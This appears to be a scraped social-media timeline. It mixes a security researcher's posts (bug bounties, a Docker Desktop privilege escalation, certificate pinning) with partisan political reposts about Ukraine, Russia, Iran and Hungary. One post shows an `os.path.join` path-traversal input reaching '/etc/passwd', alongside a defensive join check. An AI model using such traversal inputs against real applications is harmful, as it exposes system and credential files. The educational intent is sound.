We are happy to announce the launch of the Google Cloud Vulnerability Reward Program! The Cloud VRP is specifically dedicated to products and services that are part of Google Cloud. ☁️ 🐞 🤑
cloud.google.com/blog/products/…
@raesene The volume driver has been deprecated for years, so they decided to address this with a documentation update only. Even the yet-to-be-released next stable release 1.31 would be vulnerable if I hadn't sent a PR :)
In January 2020, Iran shot down a passenger plane of Ukrainian airlines. 176 people died. No one was held responsible. Then Iran supplied russia with attack drones for shelling Ukrainian cities, and supplied ammunition to the russians for the war against Ukraine. And now the president of Iran has died and we see the reaction of some "luminaries of democracy" who are more willing to lick the heels of Iranians and russians, who are open enemies, than to call the things that are happening in Europe by their names. It's pathetic. It's disgusting to look at.
“Putin murdered his political opponent and Trump hasn’t said a word after he said he would encourage Putin to invade our allies. He has, however, posted 20+ times on social media about his legal drama and fake polls.”
–Nikki Haley
Orbán wasted 10 billion forints of Hungarian families' money, then, spitting in the face of the 98%, did exactly the opposite of what he was given a mandate for. 👍
On the margins of the Russkie Il-76 shot down today. The Russkies are lying (what a surprise): the video's geolocation proves perfectly that it was flying from Belgorod toward Voronezh. It was the Il-76 that arrived in Belgorod from Iran and then continued on from there. Ukrainian prisoner exchange, my ass, you lying orcs.
🇸🇪🇭🇺 Sweden has declined Hungary's request for negotiations regarding its NATO membership bid. Swedish Foreign Minister Tobias Billström turned down Hungarian Prime Minister Viktor Orbán's proposal for discussions.
This development occurs as Turkey nears ratification of Sweden's entry into NATO, leaving Hungary as the remaining NATO member yet to approve Sweden's application. The contrast between Orbán's offer for dialogue and his public criticism of Sweden underscores the intricate relations between the two countries.
politico.eu/article/sweden…
Following Russia's massive air attack on Ukraine, US President Joe Biden calls on Congress to "take urgent action" for more aid to Kyiv, stating, "We cannot let Ukraine down."
euromaidanpress.com/2023/12/29/we-…
@0xTib3rius `os.path.join("/some/path/for/app", "downloads", "/etc/passwd")` -> `'/etc/passwd'`
If any of the segments is an absolute path, it starts the traversal from there. No need for `..`.
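An added example (not from the original post) contrasting the absolute-segment behaviour of `os.path.join` with a join that refuses to leave the base directory; the base path is the one from the post, and `safe_join` / `is_confined` are names chosen here:

```python
import os

# Base directory taken from the post; it does not need to exist for the checks below.
BASE = "/some/path/for/app"


def naive_join(base, *parts):
    """os.path.join as-is: an absolute segment discards everything before it."""
    return os.path.join(base, *parts)


def safe_join(base, *parts):
    """Join caller-supplied segments under base, refusing anything that escapes it.

    Absolute segments, '..' sequences and symlinks are all caught the same way:
    resolve the final path and require that it still sits under the resolved base.
    """
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, *parts))
    # commonpath is the longest shared prefix by path component, so a sibling such
    # as /some/path/for/app2 is rejected as well as /etc/passwd.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError(f"path escapes base directory: {candidate!r}")
    return candidate


def is_confined(base, *parts):
    """True if the joined path stays under base, False if safe_join would reject it."""
    try:
        safe_join(base, *parts)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The case from the post: the absolute segment restarts the path at /etc/passwd.
    print(naive_join(BASE, "downloads", "/etc/passwd"))
    for segs in (("downloads", "report.pdf"),
                 ("downloads", "/etc/passwd"),
                 ("downloads", "..", "..", "..", "..", "etc", "passwd")):
        print(segs, "->", "confined" if is_confined(BASE, *segs) else "REJECTED")
```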
Are there any security vulnerabilities in this code? If you think there are, please provide a proof of concept and if possible, an explanation.
Assume unauthenticated users are authorized. Negative points to anyone who thinks Python or Flask is a security vulnerability. 🤨
Continuing the mobile security topic, here is a bit of a controversial video!
A few years ago I was doing Android App security audits, and sometimes we would report "lack of SSL certificate pinning". Because I enjoy debating the topic on `what is a security issue?`, I used to argue with my colleagues about this 🤬
To me it is generally not an issue. Though there are some nuances in the threat-model and sometimes it can make sense. So I don't consider it generally important, but it's hard arguing against something that is generally regarded as "recommended best practices".
Then I saw a public talk and paper reporting this, and I used it as a scapegoat to discuss my views.
I can also say that, over 5 years later, I still have the same opinion on certificate pinning ;)
Write-up about the first batch of findings I reported to the GitHub bug bounty program:
irsl.medium.com/github-bug-bou…
One flaw in GitHub Actions and a couple in GitHub CLI. The next article will be about GitHub Enterprise Server :)
🚨BREAKING: THE COUP IS OVER | WAGNER’S RETREATING
This official statement from Prigozhin, the head of the Wagner group and the leader of this coup, says it all. I don't think anyone expected this:
"They were going to dismantle PMC Wagner. We came out on 23 June to the March of Justice. In a day, we walked to nearly 200km away from Moscow. In this time, we did not spill a single drop of blood of our fighters. Now, the moment has come when blood may spill. That’s why, understanding the responsibility for spilling Russian blood on one of the sides, we are turning back our convoys and going back to field camps according to the plan."
The President of Belarus, Lukashenko, has been in talks with Prigozhin all day and has taken credit for the peace agreement.
Prigozhin accepted the terms of Lukashenko’s agreement and agreed to halt the movement of his forces and return back to his bases.
The agreement also guarantees security for fighters of PMC Wagner.
It seems that the attempted coup has come to an end, and Prigozhin, along with his men, will return to their bases.
Reports of Wagner forces not only leaving Moscow Oblast, but also leaving Rostov.
Russian media reports that criminal cases against Yevgeny Prigozhin have already been dropped and that Prigozhin and his forces will receive FULL IMMUNITY
Restrictions on the movement of vehicles have been lifted from the Voronezh region which saw clashes earlier during the coup.
MY THOUGHTS:
- I did not expect this would end peacefully with a deal, as both sides seemed to be at the point of no return
- I have no idea how Prigozhin and Putin can both operate in Russia with what just transpired, and I also have no idea what will happen with the war in Ukraine but I wouldn’t be surprised if we see a space deal reached.
- Today was another example of citizen journalism replacing mainstream media with UNBIASED and UNCENSORED live breaking news.
- I am fried, been awake for more than 30 hours, initially doing a space with former Pakistani Prime Minister Imran Khan before shifting to the Coup space which is at 21 hours and counting. Time for me to finally sleep!
In short: containers could access WSL2 features through VSOCK. As part of the mitigation effort, seccomp policy in recent versions of Docker Desktop was improved to block this address family by default.
Docker silently fixed a privilege escalation flaw in Docker Desktop that allowed any unprivileged containers on Windows to read and modify files on the host machine. Fixed in 4.16.0.
#docker #security #windows